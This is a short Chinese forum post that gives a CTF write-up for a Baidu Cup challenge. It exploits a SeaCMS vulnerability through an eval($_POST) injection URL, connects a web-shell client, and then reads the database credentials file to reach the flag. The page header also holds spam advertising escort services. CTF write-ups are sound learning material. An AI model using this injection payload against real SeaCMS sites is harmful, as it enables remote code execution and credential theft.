站长资源变现入口 全国楼凤小姐姐 招商联系客服 招商联系客服 招商联系客服 招商联系客服

百度杯”CTF比赛 九月场 test

[复制链接]
查看216 | 回复0 | 2024-9-4 16:07:11 | 显示全部楼层 |阅读模式
看了大佬的wp之后才知道是 海洋CMS漏洞
CMS就是内容管理系统
构造url
/search.php?searchtype=5&tid=&area=eval($_POST[1])
蚁剑连接

进去扒扒数据  找不到flag啊
在这个目录里看一下数据库配置信息 /var/www/html/data/common.inc.php

给出了账户密码 那进一下数据库看一下
找到flag目录 执行后找到flag

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则